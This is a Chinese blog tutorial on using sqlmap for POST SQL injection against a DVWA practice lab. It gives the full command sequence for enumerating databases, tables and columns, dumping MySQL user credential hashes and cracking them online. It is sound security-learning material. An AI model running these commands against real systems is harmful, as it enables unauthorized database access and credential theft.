DVWA——使用sqlmap工具post注入
目录
- 环境工具
- 攻击步骤
- 一、获取并保存数据包
- 二、sqlmap注入攻击
- 1.获取数据库信息
- 2.获取MySQL数据库中的表
- 3.获取user表中的字段
- 4.获取用户名和密码
- 总结
环境工具
PS:sqlmap工具安装请查看get注入的blog
https://blog.csdn.net/qq_45833260/article/details/125657568?spm=1001.2014.3001.5502
使用phpstudy搭建的DVWA靶场-暴力破解(low级别)
sqlmap
攻击步骤
一、获取并保存数据包
- 选择暴力破解,输入用户名,密码随便输,burpsuite抓包(虽然此处是get请求方式,但不影响后面的攻击,也可以右键改成post方式)
- 在数据包右键选择copy to file,保存数据包为post.txt
二、sqlmap注入攻击
PS:将post.txt移动到和sqlmap.py同一目录下,或者写入绝对路径
1.获取数据库信息
python sqlmap.py -r post.txt -p username --dbs
注:-r表示加载一个文件,-p指定参数
2.获取MySQL数据库中的表
python sqlmap.py -r post.txt -p username -D mysql --tables
3.获取user表中的字段
python sqlmap.py -r post.txt -p username -D mysql -T user --columns
8.0版本的user表里,没有password字段,取而代之的是authentication_string。所以需要设置密码时,应该操作此字段。
4.获取用户名和密码
python sqlmap.py -r post.txt -p username -D mysql -T user -C “User,authentication_string” --dump
可以看到密码解密为root
也可以用在线的md5对密文进行解密 https://www.cmd5.com/
总结
本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
DVWA——使用sqlmap工具post注入相关推荐
- 自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范
数据来源 本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 01 耳熟能详的SQ注入是什么? 关于SQL注入漏洞,维基 ...
- sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程
Sqlmap工具 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹.访问底层文件系统.执行命令) sql注 ...
- 『安全工具』注入神器SQLMAP
原文: 『安全工具』注入神器SQLMAP Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子, ...
- 【SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
目录 1 前言 2 实验介绍 2.1 实验平台 2.2 实验目标 3 实验过程 3.1 前戏 3.2 判断注入点及注入类型 3.3 爆库名 3.4 爆表名 3.5 爆字段名 3.6 爆字段内容 3.7 ...
- 【SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
目录 1 前言 2 自动化注入案例-以sqli-labs-less9为例 2.1 实验平台 2.2 注入前准备 2.3 判断注入点及注入类型 2.3.1 自动判断注入点及注入类型 2.3.2 手动判断 ...
- 视频教程-SQL注入与SQLmap工具-漏洞挖掘与利用
SQL注入与SQLmap工具 玄道,从混迹漏洞平台与SRC应急响应中心的白帽子到创业乙方的技术与运营 刘畅 ¥15.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 AP ...
- sqlmap工具基本使用(检测sql注入)
sqlmap的用户手册: sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1.先检测是否可 ...
- 使用sqlmap检测sql注入漏洞
一. sql注入概述并安装sqlmap漏洞查看工具 1. sql注入概述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命 ...
- SQLmap工具常用命令
SQLmap工具常用命令 SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具.它有一个非常棒的特性,即对检测与利用进行自动化处理,如获取数据库指纹.访问底层文件系统.执行命令等等.
最新文章
- APUE 学习笔记 - Chapter 6. System Data File and Infomation
- 大厂也在用的 6种 数据脱敏方案,别做泄密内鬼
- [BZOJ 4800][Ceoi2015]Ice Hockey World Championship(Meet-in-the-Middle)
- ubuntu10.10各种服务器搭建
- php rpc调用,PHP 通过 JSON-RPC 调用实现以太坊交互
- 程序员述职报告范文_物流人员述职报告范文(通用5篇)
- docker容器下mongodb 4.0.0 的Replica Sets+Sharded Cluster集群
- Wireshark教程(简介、抓包、过滤器)
- java中利用正则表达式获取a标签
- java快排原理_快速排序 java实现 (原理-优化) 三路快排
- 学习Java,真的可以月薪过万嘛?真实个人经历告诉你,记录了平时学习的内容以及学习过程中最真实的感受(三)
- 怎样做计算机系统的镜像文件,Windows7 镜像制作过程 图文说明
- Linux-设备驱动概述
- RTX(2009)整合注意点
- Qt 之 HTTP 请求下载(支持断点续传)
- linux dropbox自动同步,Linux下DropBox定时同步备份文件
- Codeforces Gym100962J:Jimi Hendrix(树型DP)
- 计算机文化基础0008 17秋在线作业1,【在线】《计算机文化基础0008》17秋在线作业2.doc...
- POS Tagging 和Chunking (学习笔记)
- 从零到英雄:资产商店发行人的故事